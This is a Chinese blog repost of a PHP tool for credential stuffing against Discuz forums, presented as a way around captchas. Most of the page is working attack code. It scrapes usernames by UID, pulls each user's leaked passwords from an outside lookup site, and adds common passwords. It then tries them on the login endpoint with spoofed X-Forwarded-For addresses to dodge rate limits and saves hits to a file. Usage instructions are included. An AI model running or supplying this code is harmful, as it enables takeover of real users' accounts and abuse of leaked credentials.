php验证码爆破,Discuz爆破无视验证码

[php]

class fuckdz{

public function sgk($user){

$a=file_get_contents("http://www.soyun.org/cha_api.php?so=$user&auto=");

$a=iconv("UTF-8", "GB2312//IGNORE", $a);

preg_match_all("/7%\">(.*)

unset($arr[0]);

foreach ($arr as $key=>$r){

return $r;

}

}

public function getuid($host,$uid){

$a=file_get_contents("$host/home.php?mod=space&do=profile&from=space&&uid=$uid");

if(!strpos($a,"charset=gbk")){

$a=iconv("UTF-8", "GB2312//IGNORE", $a);

}

preg_match("/

(.*)的/isU",$a,$arr);

$a=str_replace("\r","",trim($arr[1]));

return $a=str_replace("\n","",$a);

}

public function is_pass($host,$user,$pass){

$ip= rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244);

$opts = array (

'http' => array (

'method' => 'GET',

'header'=> "User-Agent: Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile\r\nReferer:http://www.baidu.com/index.php\r\nX-Forwarded-For: $ip\r\nCookie: xx=xx",

'timeout'=>15, )

);

$context = stream_context_create($opts);

$a=file_get_contents("$host/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&handlekey=ls&quickforward=yes&username=$user&password=$pass",false,$context);

if(strpos($a,"window.location.href")){

return true;

}else{

return false;

}

}

public function crack($host,$a,$b){

$host=str_replace("http://","",$host);

$host="http://".$host."/";

for($vip=$a;$vip<=$b;$vip++){

$user=$this->getuid($host,$vip);

$pass=$this->sgk($user);

array_push($pass,"123456");

array_push($pass,"654321");

array_push($pass,"123123");

array_push($pass,"woaini");

array_push($pass,"caonima");

array_push($pass,"12345");

array_push($pass,"12345789");

array_push($pass,"5201314");

array_push($pass,"1314520");

array_push($pass,$user);

array_push($pass,$user."123456");

array_push($pass,"abc123");

array_push($pass,$user."..");

for($i=0;isset($pass[$i]);$i++){

echo "\r\n正在爆破UID:$vip-[".$user."]---".$pass[$i]."";

if($this->is_pass($host,$user,$pass[$i])){

echo "爆破成功!";

break;

file_put_contents("ok.txt", $user."---".$pass[$i]."\r\n",FILE_APPEND);

}else{

echo "爆破失败";

}

}

}

}

}

$f=new fuckdz();

error_reporting(0);

set_time_limit(0);

if(empty($argv[1])){

print_r("

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

开始爆破:php.exe $argv[0] 网址 起始uid 结束uid

示例: php.exe $argv[0] http://phpinfo.me/ 1 255

结果保存在ok.txt里

Blog:http://phpinfo.me

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \n\n\n

");

}else{

if(!empty($argv[1])){

$f->crack($argv[1],$argv[2],$argv[3]);

}else{

echo "逗比";

}

}

?>

[/php]

开启手机验证码就不行了...

f3caab6424e9df73dbb18dd12002b5bc.png

转自:http://zone.wooyun.org/content/12716

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值